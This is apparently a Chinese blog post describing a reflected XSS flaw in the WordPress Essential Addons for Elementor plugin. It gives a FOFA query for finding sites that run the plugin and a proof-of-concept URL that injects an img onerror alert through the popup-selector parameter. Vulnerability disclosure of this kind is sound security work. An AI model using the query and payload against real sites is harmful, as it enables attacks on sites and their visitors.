当前位置: 首页 > news >正文

WordPress essential-addons-for-elementor xss漏洞

news 2025/8/15 5:29:59

漏洞描述

Elementor 插件的 Essential Addons 遭受反射型跨站点脚本(XSS)漏洞该漏洞是由于 popup-selector 查询参数的验证和清理不充分而发生的,从而允许将恶意值反映回用户

搜索语法

FOFA:body="/wp-content/plugins/essential-addons-for-elementor-lite"

漏洞再现

https://your-ip/?popup-selector=%3Cimg_src%3Dx_onerror%3Dalert%28%22qaxnb%22%29%3E&eael-lostpassword=1

 

 

 

http://www.dtcms.com/a/97924.html

相关文章:

  • 全排列 II:去重的技巧与实现
  • 深入理解:阻塞IO、非阻塞IO、水平触发与边缘触发
  • 使用FastExcel时的单个和批量插入的问题
  • constant(safe-area-inset-bottom)和env(safe-area-inset-bottom)在uniapp中的使用方法解析
  • 网络安全(一):常见的网络威胁及防范
  • 【动态规划篇】- 路径问题
  • Java算法模板
  • Linux Mem -- 通过reserved-memory缩减内存
  • Python基于EdgeTTS库文本转语音
  • 大数据学习(92)-spark详解
  • sqli-labs靶场 less 3
  • CF每日5题Day5(1400)
  • 使用firewall-cmd配置SIP端口转发,实现双网卡互通,内外网方式
  • npm i 出现的网络问题
  • Python Cookbook-4.13 获取字典的一个子集
  • 19.OpenCV图像二值化
  • 【Linux笔记】进程间通信——命名管道
  • 深度学习中的数据类型
  • 17-动规-最长增长子序列
  • leetcode90-子集II
  • 我的编程之旅:从零到无限可能
  • 剖析 Redis 缓存更新策略:保障数据一致性与系统性能的平衡
  • 光传输设备现状
  • 刷题日记day14-字符串-数组去重和排序
  • flutter 专题 七十四 Flutter开发之动画
  • 【Docker镜像】Python项目之使用Dockerfile构建镜像(二)
  • 在Trae中设置Python解释器版本
  • 从零实现3D自动标注:MS3D、MS3D++
  • Android 项目问题:The specified Android SDK Build Tools version (28.0.3) is ignored
  • 【SMBIOS数据块类型列表】